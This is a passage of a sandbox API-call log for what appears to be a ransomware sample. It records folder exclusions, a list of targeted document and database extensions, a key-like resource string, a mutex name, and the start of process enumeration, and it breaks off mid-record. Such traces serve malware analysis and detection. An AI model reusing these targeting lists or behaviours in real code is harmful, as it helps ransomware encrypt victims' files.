CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] FindResourceW 
(hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0099.885] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0099.885] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0099.885] LockResource (hResData=0x516f58) returned 0x516f58 [0099.885] FreeResource (hResData=0x516f58) returned 0 [0099.885] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.885] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.885] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.885] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521d70, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521d70, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.885] FreeResource (hResData=0x50d64c) returned 0 [0099.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521d74, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] GetCurrentThreadId () returned 0xc18 [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bace8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) 
returned 97 [0099.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bace8, cbMultiByte=97, lpWideCharStr=0x14781ec, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0099.886] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0099.886] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0099.886] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0099.886] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.886] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="35Brother1ProcessMutex6") returned 0x0 [0099.886] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="35Brother1ProcessMutex6") returned 0xb8 [0099.886] Sleep (dwMilliseconds=0x12c) [0100.296] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x14ef63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0100.296] GetProcAddress (hModule=0x76910000, 
lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x14d2d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0100.296] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0100.296] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x14d2d0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", 
cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x14d2d0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x14ef63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x14d2d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x14d2d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0100.297] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0100.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x14d2d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x14d2d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 
0x7694c59e [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0100.299] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0100.299] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0100.305] Process32FirstW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
